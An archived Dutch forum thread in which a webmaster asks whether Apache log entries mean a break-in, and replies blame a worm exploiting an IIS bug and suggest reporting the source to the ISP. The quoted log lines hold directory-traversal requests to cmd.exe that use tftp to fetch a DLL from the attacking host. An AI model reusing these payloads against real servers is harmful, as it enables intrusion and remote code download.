Op deze website gebruiken we cookies om content en advertenties te personaliseren, om functies voor social media te bieden en om ons websiteverkeer te analyseren. Ook delen we informatie over uw gebruik van onze site met onze partners voor social media, adverteren en analyse. Deze partners kunnen deze gegevens combineren met andere informatie die u aan ze heeft verstrekt of die ze hebben verzameld op basis van uw gebruik van hun services. Meer informatie.

Akkoord

Vraag & Antwoord

Beveiliging & privacy

Webserver gehackt?

Anoniem
Remytje
3 antwoorden
  • Mijn logfile van Apache geeft de volgende regels aan:
    [quote:4667f37526]62.194.35.158 - - [11/Jul/2002:22:33:07 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.194.35.158%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:09 +0100] "GET /scripts/..%255c../httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:11 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:13 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.194.35.158%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:15 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.194.35.158%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:16 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.194.35.158%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:18 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:20 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 8296 "-" "-"
    [/quote:4667f37526]

    Zijn dit pogingen of is er al daadwerkelijk ingebroken? Ik heb soieso geen [i:4667f37526]winnt[/i:4667f37526] directory.

    Dit IP-adres, 62.194.35.158, krijg ik afgelopen dag vrij vaak te zien in mijn logfile, dus diegene probeert het hardnekkig (of het is al gelukt?). Daarom wil ik achterhalen wie dit is. Ik weet al dat het een chello-gebruiker is, maar heeft iemand nog tips hoe je verder de persoon kan achterhalen?
  • Dit is waarschijnlijk iemand met een code red virus. Je kunt het beste een email sturen naar chello met daarbij het ip adres van deze persoon en de logfile met daarin de entries. Waarschijnlijk abuse@chello.nl maar dat weet ik niet helemaal zeker. Je hoeft je hierover geen zorgen te maken, want het is een internet information server bug en dat werkt niet op apache. De persoon weet waarschijnlijk niet eens dat zijn pc dit bericht verstuurd. Daarom even een mail naar chello.

    grtz
  • inetnum: 62.194.0.0 - 62.194.0.127
    netname: CMTS-01-1
    descr: UPC-NL / Chello
    descr: DTV Platform Amsterdam
    country: NL
    admin-c: UCR1-RIPE
    tech-c: UCR1-RIPE
    status: ASSIGNED PA
    notify: registry@upc.nl
    mnt-by: UPCNL-MNT
    changed: registry@upc.nl 20010622
    source: RIPE

    route: 62.194.0.0/15
    descr: A2000 / Kabeltelevisie Amsterdam B.V.
    origin: AS8209
    remarks: —————————————————
    remarks: E-mail is the preferred contact method!
    remarks: —————————————————
    remarks: Please use one of the following addresses:
    [b:304f8fbedd]remarks: abuse@a2000.nl - for abuse notification[/b:304f8fbedd]
    remarks: helpdesk@A2000.nl - Technical support for customers
    remarks: hostmaster@a2000.com - For the hostmaster team
    remarks: —————————————————
    notify: hostmaster@A2000.com
    mnt-by: A2000-KTA-MNT
    changed: rhuisman@upc.nl 20010105
    source: RIPE

Beantwoord deze vraag

Dit is een gearchiveerde pagina. Antwoorden is niet meer mogelijk.